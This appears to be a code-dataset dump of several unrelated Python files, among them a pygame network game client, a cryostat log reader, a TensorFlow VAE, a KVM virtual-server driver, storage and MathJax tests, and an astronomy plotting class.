content stringlengths 5 1.05M |
|---|
# Written by Måns Andersson
import pygame
import sys
import socket
import json
import threading
pygame.init()
# This variable holds the entire state of the game
state = {
"players": [],
"blockades": [],
"bombs": [],
"snowflakes": [],
"placed_bombs": [],
"explosions": [],
"winner": -1,
}
# Initializing pygame and all assets
screen = pygame.display.set_mode((800, 800), pygame.DOUBLEBUF)
player_image_1 = pygame.image.load("assets/player1.png").convert_alpha()
player_image_2 = pygame.image.load("assets/player2.png").convert_alpha()
player_image_3 = pygame.image.load("assets/player3.png").convert_alpha()
player_image_4 = pygame.image.load("assets/player4.png").convert_alpha()
block_image = pygame.image.load("assets/block.png").convert_alpha()
gift_image = pygame.image.load("assets/gift.png").convert_alpha()
bomb_image = pygame.image.load("assets/bomb.png").convert_alpha()
damaged_image = pygame.image.load("assets/damaged.png").convert_alpha()
frozen_image = pygame.image.load("assets/frozen.png").convert_alpha()
snowflake_image = pygame.image.load("assets/snowflake.png").convert_alpha()
dead_image = pygame.image.load("assets/dead.png").convert_alpha()
explosion_image = pygame.image.load("assets/explosion.png").convert_alpha()
victory_text = pygame.image.load("assets/victory_text.png").convert_alpha()
player_images = [player_image_1, player_image_2, player_image_3, player_image_4]
# Establish connection to the server, crash if fail
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8080))
# Variable to keep track of how often to do certain things
last_update = pygame.time.get_ticks()
def main():
while True:
events()
keypress()
render()
# Updates state based on data received from the server
# Runs in a seperate thread
def listener():
while True:
new_state = receive_state()
try:
parsed = json.loads(new_state)
except:
print("Couldn't parse json")
try:
state.update(parsed)
except:
print("Couldn't load data into state")
# Helper for listener()
def receive_state():
buffer = ""
while True:
buffer += s.recv(1024).decode("utf-8")
result = buffer.split(";")
if len(result) > 2:
for res in result[1 : len(result) - 1]:
if len(res) > 0:
return res
# Renders all the graphics of the game based on the contents in state
def render():
screen.fill((0, 0, 0))
if state["winner"] != -1:
# Someone won the game
render_victory_message(state["winner"])
return
for player in state["players"]:
render_player(player["id"])
for blockade in state["blockades"]:
screen.blit(block_image, (blockade["x_pos"] - 25, blockade["y_pos"] - 25))
for bomb in state["bombs"]:
if bomb["spawned"]:
screen.blit(gift_image, (bomb["x_pos"] - 25, bomb["y_pos"] - 25))
for bomb in state["placed_bombs"]:
if bomb["spawned"]:
screen.blit(bomb_image, (bomb["x_pos"] - 25, bomb["y_pos"] - 25))
for snowflake in state["snowflakes"]:
if snowflake["spawned"]:
screen.blit(
snowflake_image, (snowflake["x_pos"] - 25, snowflake["y_pos"] - 25)
)
for explosion in state["explosions"]:
if explosion["spawned"]:
screen.blit(
explosion_image, (explosion["x_pos"] - 100, explosion["y_pos"] - 100)
)
pygame.display.update()
# Render different images for players based on their ID
# Special images are used when a player is dead, damaged or stunned
def render_player(id):
player = state["players"][id]
if player["spawned"]:
if player["dead"]:
screen.blit(dead_image, (player["x_pos"] - 50, player["y_pos"] - 50))
elif player["damage_taken"]:
screen.blit(damaged_image, (player["x_pos"] - 50, player["y_pos"] - 50))
elif player["stunned"]:
screen.blit(frozen_image, (player["x_pos"] - 50, player["y_pos"] - 50))
else:
screen.blit(player_images[id], (player["x_pos"] - 50, player["y_pos"] - 50))
# Renders a special victory message based on the id of the winning player
def render_victory_message(winnerID):
screen.blit(player_images[winnerID], (350, 350))
screen.blit(victory_text, (100, 460))
pygame.display.update()
def events():
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
# Read keypresses and send corresponding json data to the server
def keypress():
global last_update
current_time = pygame.time.get_ticks()
if current_time - last_update < 16:
return
last_update = current_time
keys = pygame.key.get_pressed()
if keys[pygame.K_UP]:
s.sendall(b'{ "action":"up"};')
elif keys[pygame.K_LEFT]:
s.sendall(b'{ "action":"left"};')
elif keys[pygame.K_DOWN]:
s.sendall(b'{ "action":"down"};')
elif keys[pygame.K_RIGHT]:
s.sendall(b'{ "action":"right"};')
elif keys[pygame.K_SPACE]:
s.sendall(b'{ "action":"space"};')
if __name__ == "__main__":
l = threading.Thread(target=listener, args=(), daemon=True)
l.start()
main()
|
from aiosql_mysql.adapters.pymysql import PyMySQLAdaptor
from aiosql_mysql.adapters.asyncmy import AsyncMySQLAdapter |
#!/usr/bin/env python
import argparse
import os
import shutil
def parse_args():
ap = argparse.ArgumentParser()
ap.add_argument("--check-basename", nargs="+", action="append", metavar=("PATH ...", "BASE"))
ap.add_argument("--copy", nargs="+", action="append", metavar=("SRC", "DEST"))
return ap.parse_args()
def main():
args = parse_args()
for check in args.check_basename:
# The first half of the arguments are paths, the second are basenames
paths = check[0:int(len(check)/2)]
basenames = check[int(len(check)/2):]
assert len(paths) == len(basenames), "All paths must have a corresponding basename"
for path, basename in zip(paths, basenames):
assert os.path.basename(path) == basename, \
"basename of '%s' is not equal to '%s'" % (path, basename)
for copy in args.copy:
assert len(copy) >= 2, "At least one source and destination required"
srcs = copy[:-1]
dest = copy[-1]
assert len(srcs) == 1 or os.path.isdir(dest), \
"Destination must be an existing directory when copying multiple sources"
for src in srcs:
shutil.copy(src, dest)
if __name__ == "__main__":
main()
|
'''Reading Dilution Status'''
from pathlib import Path
from datetime import datetime
from time import mktime
from os import listdir
from numpy import diff
from pyqum.instrument.analyzer import derivative, curve
class bluefors:
def __init__(self):
self.LogPath = Path(r'\\BLUEFORSAS\BlueLogs')
self.Days = listdir(self.LogPath)
def whichday(self):
total = len(self.Days)
for i,day in enumerate(self.Days):
print("%s. %s" %(i+1,day))
while True:
try:
k = int(input("Which day would you like to check out (1-%s): " %total))
if k-1 in range(total):
break
except(ValueError):
print("Bad index. Please use numeric!")
return k-1
def selectday(self, index):
try:
self.Date = self.Days[index]
print("Date selected: %s"%self.Date)
except(ValueError):
print("index might be out of range")
pass
def pressure(self, Channel):
LogFile = self.LogPath / self.Date / ("maxigauge " + self.Date + ".log")
with open(LogFile, 'r') as L:
L = L.read()
Plog = L.split('\n')[:-1]
Plog = [x for x in Plog if ',,' not in x] #filter-out bad logs
t = [datetime.strptime(x.split("CH")[0][:-1].split(',')[1], '%H:%M:%S') for x in Plog]
startime = t[0].strftime('%H:%M:%S')
t = [(x-t[0]).total_seconds()/3600 for x in t]
P = [float(x.split("CH")[Channel][14:21]) for x in Plog]
P_stat = [int(x.split("CH")[Channel][11]) for x in Plog]
return startime, t, P, P_stat
def temperature(self, Channel):
LogFile = self.LogPath / self.Date / ("CH%s T "%Channel + self.Date + ".log")
with open(LogFile, 'r') as L:
L = L.read()
Tlog = list([x.split(',') for x in L.split('\n')[:-1]])
t, T = [datetime.strptime(x[1], '%H:%M:%S') for x in Tlog], [float(x[2]) for x in Tlog]
startime = t[0].strftime('%H:%M:%S')
t = [(x-t[0]).total_seconds()/3600 for x in t]
return startime, t, T
def test():
b = bluefors()
b.selectday(b.whichday())
P = b.pressure(6)
curve(P[1], P[2], "Starting %s"%P[0], "t(hr)", "P(mbar)")
T = b.temperature(1)
curve(T[1], T[2], "Starting %s"%T[0], "t(hr)", "T(K)")
t, dTdt = derivative(T[1], T[2], 3)
curve(t, dTdt, "Starting %s"%T[0], "t(hr)", "dT/dt(K)")
test() |
#!/usr/bin/env python
"""
@author: Dan Salo, Jan 2017
Purpose: Implement Convolutional Variational Autoencoder for Semi-Supervision with partially-labeled MNIST dataset.
MNIST Dataset will be downloaded and batched automatically.
"""
from tensorbase.base import Model, Layers
from tensorbase.data import Mnist
from scipy.misc import imsave
import sys
import tensorflow as tf
import numpy as np
import math
# Global Dictionary of Flags
flags = {
'data_directory': 'MNIST_data/',
'save_directory': 'summaries/',
'model_directory': 'conv_vae/',
'restore': False,
'restore_file': 'start.ckpt',
'datasets': 'MNIST',
'image_dim': 28,
'hidden_size': 10,
'num_classes': 10,
'batch_size': 100,
'display_step': 200,
'weight_decay': 1e-6,
'learning_rate': 0.001,
'epochs': 100,
'run_num': 1,
}
class ConvVae(Model):
def __init__(self, flags_input, run_num):
super().__init__(flags_input, run_num)
def _data(self):
""" Define data I/O """
self.x = tf.placeholder(tf.float32, [None, flags['image_dim'], flags['image_dim'], 1], name='x')
self.epsilon = tf.placeholder(tf.float32, [None, flags['hidden_size']], name='epsilon')
self.data = Mnist(self.flags)
def _summaries(self):
""" Define summaries for Tensorboard """
tf.summary.scalar("Total_Loss", self.cost)
tf.summary.scalar("Reconstruction_Loss", self.recon)
tf.summary.scalar("VAE_Loss", self.vae)
tf.summary.scalar("Weight_Decay_Loss", self.weight)
tf.summary.histogram("Mean", self.mean)
tf.summary.histogram("Stddev", self.stddev)
tf.summary.image("x", self.x)
tf.summary.image("x_hat", self.x_hat)
def _encoder(self, x):
"""Define q(z|x) network"""
encoder = Layers(x)
encoder.conv2d(5, 64)
encoder.maxpool()
encoder.conv2d(3, 64)
encoder.conv2d(3, 64)
encoder.conv2d(3, 128, stride=2)
encoder.conv2d(3, 128)
encoder.conv2d(1, 64)
encoder.conv2d(1, self.flags['hidden_size'] * 2, activation_fn=None)
encoder.avgpool(globe=True)
return encoder.get_output()
def _decoder(self, z):
""" Define p(x|z) network"""
if z is None:
mean = None
stddev = None
input_sample = self.epsilon
else:
z = tf.reshape(z, [-1, self.flags['hidden_size'] * 2])
print(z.get_shape())
mean, stddev = tf.split(1, 2, z)
stddev = tf.sqrt(tf.exp(stddev))
input_sample = mean + self.epsilon * stddev
decoder = Layers(tf.expand_dims(tf.expand_dims(input_sample, 1), 1))
decoder.deconv2d(3, 128, padding='VALID')
decoder.deconv2d(3, 128, padding='VALID', stride=2)
decoder.deconv2d(3, 64, stride=2)
decoder.deconv2d(3, 64, stride=2)
decoder.deconv2d(5, 1, activation_fn=tf.nn.tanh, s_value=None)
return decoder.get_output(), mean, stddev
def _network(self):
""" Define network """
with tf.variable_scope("model"):
self.latent = self._encoder(x=self.x)
self.x_hat, self.mean, self.stddev = self._decoder(z=self.latent)
with tf.variable_scope("model", reuse=True):
self.x_gen, _, _ = self._decoder(z=None)
def _optimizer(self):
""" Define losses and initialize optimizer """
epsilon = 1e-8
const = 1/(self.flags['batch_size'] * self.flags['image_dim'] * self.flags['image_dim'])
self.recon = const * tf.reduce_sum(tf.squared_difference(self.x, self.x_hat))
self.vae = const * -0.5 * tf.reduce_sum(1.0 - tf.square(self.mean) - tf.square(self.stddev) + 2.0 * tf.log(self.stddev + epsilon))
self.weight = self.flags['weight_decay'] * tf.add_n(tf.get_collection('weight_losses'))
self.cost = tf.reduce_sum(self.vae + self.recon + self.weight)
self.optimizer = tf.train.AdamOptimizer(learning_rate=self.flags['learning_rate']).minimize(self.cost)
def _generate_train_batch(self):
""" Generate a training batch of images """
self.train_batch_y, self.train_batch_x = self.data.next_train_batch(self.flags['batch_size'])
self.norm = np.random.standard_normal([self.flags['batch_size'], self.flags['hidden_size']])
def _run_train_iter(self):
""" Run training iteration"""
summary, _ = self.sess.run([self.merged, self.optimizer],
feed_dict={self.x: self.train_batch_x, self.epsilon: self.norm})
return summary
def _run_train_metrics_iter(self):
""" Run training iteration and also calculate metrics """
summary, self.loss, self.x_recon, _ =\
self.sess.run([self.merged, self.cost, self.x_hat, self.optimizer],
feed_dict={self.x: self.train_batch_x, self.epsilon: self.norm})
return summary
def _record_train_metrics(self):
""" Record training metrics """
for j in range(1):
imsave(self.flags['restore_directory'] + 'x_' + str(self.step) + '.png', np.squeeze(self.train_batch_x[j]))
imsave(self.flags['restore_directory'] + 'x_recon_' + str(self.step) + '.png', np.squeeze(self.x_recon[j]))
self.print_log("Batch Number: " + str(self.step) + ", Image Loss= " + "{:.6f}".format(self.loss))
def train(self):
""" Train the autoencoder """
self.print_log('Learning Rate: %d' % self.flags['learning_rate'])
iters = self.flags['epochs'] * self.data.num_train_images
self.print_log('Iterations: %d' % iters)
for i in range(iters):
print('Batch number: %d' % self.step)
self._generate_train_batch()
if self.step % self.flags['display_step'] != 0:
summary = self._run_train_iter()
else:
summary = self._run_train_metrics_iter()
self._record_train_metrics()
self._record_training_step(summary)
self._save_model(section=i)
def main():
flags['seed'] = np.random.randint(1, 1000, 1)[0]
flags['run_num'] = sys.argv[1]
model_vae = ConvVae(flags, run_num=flags['run_num'])
model_vae.train()
if __name__ == "__main__":
main()
|
from traceback import format_exc
from urlparse import urlparse
from telnetlib import Telnet
import httplib
import sys
try:
import simplejson as json
except ImportError:
import json
from basicserver import BasicVirtualServer
from clusto.exceptions import DriverException
import clusto
class KVMVirtualServer(BasicVirtualServer):
_driver_name = "kvmvirtualserver"
def __init__(self, name, **kwargs):
BasicVirtualServer.__init__(self, name, **kwargs)
def get_hypervisor(self):
from clusto.drivers import VMManager
host = VMManager.resources(self)
if not host:
raise DriverException('Cannot start a VM without first allocating a hypervisor')
return host[0].value
def _request(self, method, endpoint, body=None):
host = self.get_hypervisor().get_ips()[0]
conn = httplib.HTTPConnection(host, 3000)
if body:
body = json.dumps(body, indent=2, sort_keys=True)
conn.request(method, endpoint, body)
response = conn.getresponse()
return (response.status, response.read())
def kvm_create(self, options):
status, response = self._request('POST', '/api/1/%s' % self.name, {
'memory': options.memory,
'disk': options.disk,
})
if status != 200:
raise DriverException(response)
response = json.loads(response)
config = response['config']
try:
clusto.begin_transaction()
self.set_attr(key='system', subkey='memory', value=config['memory'])
self.set_attr(key='system', subkey='disk', value=config['disk'])
self.set_attr(key='system', subkey='cpucount', value=1)
self.set_attr(key='kvm', subkey='console-port', value=config['console'])
self.set_attr(key='kvm', subkey='vnc-port', value=5900 + config['vnc'])
self.set_port_attr('nic-eth', 1, 'mac', config['mac'])
self.set_port_attr('nic-eth', 1, 'model', config['nic'])
clusto.SESSION.clusto_description = 'Populate KVM information for %s' % self.name
clusto.commit()
except:
sys.stderr.write(format_exc() + '\n')
clusto.rollback_transaction()
def kvm_update(self, options):
attr = dict([(x.subkey, x.value) for x in self.attrs(key='system')])
status, response = self._request('PUT', '/api/1/%s' % self.name, {
'memory': attr['memory'],
'disk': attr['disk'],
'mac': self.get_port_attr('nic-eth', 1, 'mac'),
'nic': self.get_port_attr('nic-eth', 1, 'model'),
})
if status != 201:
raise DriverException(response)
#response = json.loads(response)
def kvm_delete(self, options):
status, response = self._request('DELETE', '/api/1/%s' % self.name)
if status != 200:
raise DriverException(response)
def kvm_status(self, options):
status, response = self._request('GET', '/api/1/%s' % self.name)
if status != 200:
raise DriverException(response)
response = json.loads(response)
return response['state']
def kvm_start(self, options):
status, response = self._request('POST', '/api/1/%s/start' % self.name)
if status != 200:
raise DriverException(response)
response = json.loads(response)
if response['state'] != 'RUNNING':
raise DriverException('VM is not in the RUNNING state after starting')
def kvm_stop(self, options):
status, response = self._request('POST', '/api/1/%s/stop' % self.name)
if status != 200:
raise DriverException(response)
response = json.loads(response)
if response['state'] != 'STOPPED':
raise DriverException('VM is not in the STOPPED state after stopping')
def kvm_console(self, options):
client = Telnet(self.get_hypervisor().get_ips()[0], self.attr_value(key='kvm', subkey='console'))
client.interact()
|
import pytest
try:
from jupyter_server_mathjax.app import STATIC_ASSETS_PATH
HAS_JSMX = True
except Exception: # pragma: no cover
STATIC_ASSETS_PATH = None
HAS_JSMX = False
EXCURSIONS = [
[False, ["--ignore-sys-prefix"]],
[False, ["--disable-addons", "mathjax"]],
]
if STATIC_ASSETS_PATH:
EXCURSIONS += [
[True, None],
[True, ["--mathjax-dir", STATIC_ASSETS_PATH]],
]
@pytest.mark.parametrize("expected,extra_args", EXCURSIONS)
def test_mathjax(
an_empty_lite_dir,
script_runner,
extra_args,
expected,
):
"""does bundled mathjax work?"""
extra_args = extra_args or []
kwargs = dict(cwd=str(an_empty_lite_dir))
status = script_runner.run("jupyter", "lite", "status", *extra_args, **kwargs)
assert status.success, "the status did NOT succeed"
build = script_runner.run("jupyter", "lite", "build", *extra_args, **kwargs)
assert build.success, "the build did NOT succeed"
mathjax_path = (
an_empty_lite_dir / "_output/static/jupyter_server_mathjax/MathJax.js"
)
if expected:
assert mathjax_path.exists(), f"{mathjax_path} was expected"
else:
assert not mathjax_path.exists(), f"{mathjax_path} was NOT expected"
check = script_runner.run("jupyter", "lite", "check", *extra_args, **kwargs)
assert check.success, "the build did NOT check out"
|
import pytest
import numpy as np
from pipex import H5Storage, channel_map, map, source, PRecord
def test_h5storage():
storage = H5Storage("/tmp")
image = np.array([[0, 0], [0, 0]], dtype=np.uint8)
bucket = storage['pipex_test/test_pstorage']
pl = [1, 2, 3] >> channel_map('image', lambda _: image) >> bucket
pl.do()
restored = list(bucket)
assert len(restored) == 3
for precord in restored:
assert np.all(precord['image'] == image)
assert set(precord.value for precord in restored) == set([1, 2, 3])
def test_h5bucket_skipping(mocker):
class TestSource(source):
def __init__(self):
self.counter = 0
def generate(self):
self.counter += 1
yield from [1,2,3]
def fetch_source_data_version(self, our):
from pipex.pbase import SourceDataVersion
return SourceDataVersion(data_hash="")
storage = H5Storage("/tmp")
bucket = storage['pipex_test/test_pstorage']
bucket_2 = storage['pipex_test/test_pstorage_2']
test_source = TestSource()
pl = test_source >> bucket >> map(lambda x: x + 1) >> bucket_2
pl.do()
assert test_source.counter == 1
pl.do()
# should skip
assert test_source.counter == 1
def test_h5_for_specific_ids():
storage = H5Storage("/tmp")
bucket = storage['pipex_test/test_pstorage_3']
precords = [
PRecord.from_object(1, 'default', "id_1"),
PRecord.from_object(2, 'default', "id_2"),
PRecord.from_object(3, 'default', "id_3"),
]
(precords >> bucket).do()
assert list((bucket.with_ids(["id_2", "id_3"]) >> map(lambda x: x + 1)).values()) == [3, 4]
assert list(bucket.with_ids(["id_999"])) == []
|
import numpy as np
from typing import Callable
from autoarray.plot.abstract_plotters import Plotter
from autoarray.plot.mat_wrap.visuals import Visuals1D
from autoarray.plot.mat_wrap.visuals import Visuals2D
from autoarray.plot.mat_wrap.include import Include1D
from autoarray.plot.mat_wrap.include import Include2D
from autoarray.plot.mat_wrap.mat_plot import MatPlot1D
from autoarray.plot.mat_wrap.mat_plot import MatPlot2D
from autoarray.plot.mat_wrap.mat_plot import AutoLabels
from autoarray.fit.fit_dataset import FitInterferometer
class FitInterferometerPlotterMeta(Plotter):
def __init__(
self,
fit,
get_visuals_2d_real_space: Callable,
mat_plot_1d: MatPlot1D,
visuals_1d: Visuals1D,
include_1d: Include1D,
mat_plot_2d: MatPlot2D = MatPlot2D(),
visuals_2d: Visuals2D = Visuals2D(),
include_2d: Include2D = Include2D(),
):
"""
Plots the attributes of `FitInterferometer` objects using the matplotlib method `imshow()` and many
other matplotlib functions which customize the plot's appearance.
The `mat_plot_1d` and `mat_plot_2d` attributes wrap matplotlib function calls to make the figure. By default,
the settings passed to every matplotlib function called are those specified in
the `config/visualize/mat_wrap/*.ini` files, but a user can manually input values into `MatPlot2d` to
customize the figure's appearance.
Overlaid on the figure are visuals, contained in the `Visuals1D` and `Visuals2D` objects. Attributes may be
extracted from the `FitInterferometer` and plotted via the visuals object, if the corresponding entry is `True` in
the `Include1D` or `Include2D` object or the `config/visualize/include.ini` file.
Parameters
----------
fit
The fit to an interferometer dataset the plotter plots.
get_visuals_2d
A function which extracts from the `FitInterferometer` the 2D visuals which are plotted on figures.
mat_plot_1d
Contains objects which wrap the matplotlib function calls that make 1D plots.
visuals_1d
Contains 1D visuals that can be overlaid on 1D plots.
include_1d
Specifies which attributes of the `FitInterferometer` are extracted and plotted as visuals for 1D plots.
mat_plot_2d
Contains objects which wrap the matplotlib function calls that make 2D plots.
visuals_2d
Contains 2D visuals that can be overlaid on 2D plots.
include_2d
Specifies which attributes of the `FitInterferometer` are extracted and plotted as visuals for 2D plots.
"""
super().__init__(
mat_plot_1d=mat_plot_1d,
include_1d=include_1d,
visuals_1d=visuals_1d,
mat_plot_2d=mat_plot_2d,
include_2d=include_2d,
visuals_2d=visuals_2d,
)
self.fit = fit
self.get_visuals_2d_real_space = get_visuals_2d_real_space
def figures_2d(
self,
visibilities: bool = False,
noise_map: bool = False,
signal_to_noise_map: bool = False,
model_visibilities: bool = False,
residual_map_real: bool = False,
residual_map_imag: bool = False,
normalized_residual_map_real: bool = False,
normalized_residual_map_imag: bool = False,
chi_squared_map_real: bool = False,
chi_squared_map_imag: bool = False,
dirty_image: bool = False,
dirty_noise_map: bool = False,
dirty_signal_to_noise_map: bool = False,
dirty_model_image: bool = False,
dirty_residual_map: bool = False,
dirty_normalized_residual_map: bool = False,
dirty_chi_squared_map: bool = False,
):
"""
Plots the individual attributes of the plotter's `FitInterferometer` object in 1D and 2D.
The API is such that every plottable attribute of the `Interferometer` object is an input parameter of type
bool of the function, which if switched to `True` means that it is plotted.
Parameters
----------
visibilities
Whether or not to make a 2D plot (via `scatter`) of the visibility data.
noise_map
Whether or not to make a 2D plot (via `scatter`) of the noise-map.
signal_to_noise_map
Whether or not to make a 2D plot (via `scatter`) of the signal-to-noise-map.
model_visibilities
Whether or not to make a 2D plot (via `scatter`) of the model visibility data.
residual_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the residual map.
residual_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the residual map.
normalized_residual_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the normalized residual map.
normalized_residual_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the normalized residual map.
chi_squared_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the chi-squared map.
chi_squared_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the chi-squared map.
dirty_image
Whether or not to make a 2D plot (via `imshow`) of the dirty image.
dirty_noise_map
Whether or not to make a 2D plot (via `imshow`) of the dirty noise map.
dirty_model_image
Whether or not to make a 2D plot (via `imshow`) of the dirty model image.
dirty_residual_map
Whether or not to make a 2D plot (via `imshow`) of the dirty residual map.
dirty_normalized_residual_map
Whether or not to make a 2D plot (via `imshow`) of the dirty normalized residual map.
dirty_chi_squared_map
Whether or not to make a 2D plot (via `imshow`) of the dirty chi-squared map.
"""
if visibilities:
self.mat_plot_2d.plot_grid(
grid=self.fit.visibilities.in_grid,
visuals_2d=self.visuals_2d,
auto_labels=AutoLabels(title="Visibilities", filename="visibilities"),
color_array=np.real(self.fit.noise_map),
)
if noise_map:
self.mat_plot_2d.plot_grid(
grid=self.fit.visibilities.in_grid,
visuals_2d=self.visuals_2d,
auto_labels=AutoLabels(title="Noise-Map", filename="noise_map"),
color_array=np.real(self.fit.noise_map),
)
if signal_to_noise_map:
self.mat_plot_2d.plot_grid(
grid=self.fit.visibilities.in_grid,
visuals_2d=self.visuals_2d,
auto_labels=AutoLabels(
title="Signal-To-Noise Map", filename="signal_to_noise_map"
),
color_array=np.real(self.fit.signal_to_noise_map),
)
if model_visibilities:
self.mat_plot_2d.plot_grid(
grid=self.fit.visibilities.in_grid,
visuals_2d=self.visuals_2d,
auto_labels=AutoLabels(
title="Model Visibilities", filename="model_visibilities"
),
color_array=np.real(self.fit.model_data),
)
if residual_map_real:
self.mat_plot_1d.plot_yx(
y=np.real(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Residual Map vs UV-Distance (real)",
filename="real_residual_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if residual_map_imag:
self.mat_plot_1d.plot_yx(
y=np.imag(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Residual Map vs UV-Distance (imag)",
filename="imag_residual_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if normalized_residual_map_real:
self.mat_plot_1d.plot_yx(
y=np.real(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Normalized Residual Map vs UV-Distance (real)",
filename="real_normalized_residual_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if normalized_residual_map_imag:
self.mat_plot_1d.plot_yx(
y=np.imag(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Normalized Residual Map vs UV-Distance (imag)",
filename="imag_normalized_residual_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if chi_squared_map_real:
self.mat_plot_1d.plot_yx(
y=np.real(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Chi-Squared Map vs UV-Distance (real)",
filename="real_chi_squared_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if chi_squared_map_imag:
self.mat_plot_1d.plot_yx(
y=np.imag(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Chi-Squared Map vs UV-Distance (imag)",
filename="imag_chi_squared_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if dirty_image:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_image,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(title="Dirty Image", filename="dirty_image_2d"),
)
if dirty_noise_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_noise_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Noise Map", filename="dirty_noise_map_2d"
),
)
if dirty_signal_to_noise_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_signal_to_noise_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Signal-To-Noise Map",
filename="dirty_signal_to_noise_map_2d",
),
)
if dirty_model_image:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_model_image,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Model Image", filename="dirty_model_image_2d"
),
)
if dirty_residual_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_residual_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Residual Map", filename="dirty_residual_map_2d"
),
)
if dirty_normalized_residual_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_normalized_residual_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Normalized Residual Map",
filename="dirty_normalized_residual_map_2d",
),
)
if dirty_chi_squared_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_chi_squared_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Chi-Squared Map", filename="dirty_chi_squared_map_2d"
),
)
def subplot(
self,
visibilities: bool = False,
noise_map: bool = False,
signal_to_noise_map: bool = False,
model_visibilities: bool = False,
residual_map_real: bool = False,
residual_map_imag: bool = False,
normalized_residual_map_real: bool = False,
normalized_residual_map_imag: bool = False,
chi_squared_map_real: bool = False,
chi_squared_map_imag: bool = False,
dirty_image: bool = False,
dirty_noise_map: bool = False,
dirty_signal_to_noise_map: bool = False,
dirty_model_image: bool = False,
dirty_residual_map: bool = False,
dirty_normalized_residual_map: bool = False,
dirty_chi_squared_map: bool = False,
auto_filename: str = "subplot_fit_interferometer",
):
"""
Plots the individual attributes of the plotter's `FitInterferometer` object in 1D and 2D on a subplot.
The API is such that every plottable attribute of the `Interferometer` object is an input parameter of type
bool of the function, which if switched to `True` means that it is included on the subplot.
Parameters
----------
visibilities
Whether or not to make a 2D plot (via `scatter`) of the visibility data.
noise_map
Whether or not to make a 2D plot (via `scatter`) of the noise-map.
signal_to_noise_map
Whether or not to make a 2D plot (via `scatter`) of the signal-to-noise-map.
model_visibilities
Whether or not to make a 2D plot (via `scatter`) of the model visibility data.
residual_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the residual map.
residual_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the residual map.
normalized_residual_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the normalized residual map.
normalized_residual_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the normalized residual map.
chi_squared_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the chi-squared map.
chi_squared_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the chi-squared map.
dirty_image
Whether or not to make a 2D plot (via `imshow`) of the dirty image.
dirty_noise_map
Whether or not to make a 2D plot (via `imshow`) of the dirty noise map.
dirty_model_image
Whether or not to make a 2D plot (via `imshow`) of the dirty model image.
dirty_residual_map
Whether or not to make a 2D plot (via `imshow`) of the dirty residual map.
dirty_normalized_residual_map
Whether or not to make a 2D plot (via `imshow`) of the dirty normalized residual map.
dirty_chi_squared_map
Whether or not to make a 2D plot (via `imshow`) of the dirty chi-squared map.
auto_filename
The default filename of the output subplot if written to hard-disk.
"""
self._subplot_custom_plot(
visibilities=visibilities,
noise_map=noise_map,
signal_to_noise_map=signal_to_noise_map,
model_visibilities=model_visibilities,
residual_map_real=residual_map_real,
residual_map_imag=residual_map_imag,
normalized_residual_map_real=normalized_residual_map_real,
normalized_residual_map_imag=normalized_residual_map_imag,
chi_squared_map_real=chi_squared_map_real,
chi_squared_map_imag=chi_squared_map_imag,
dirty_image=dirty_image,
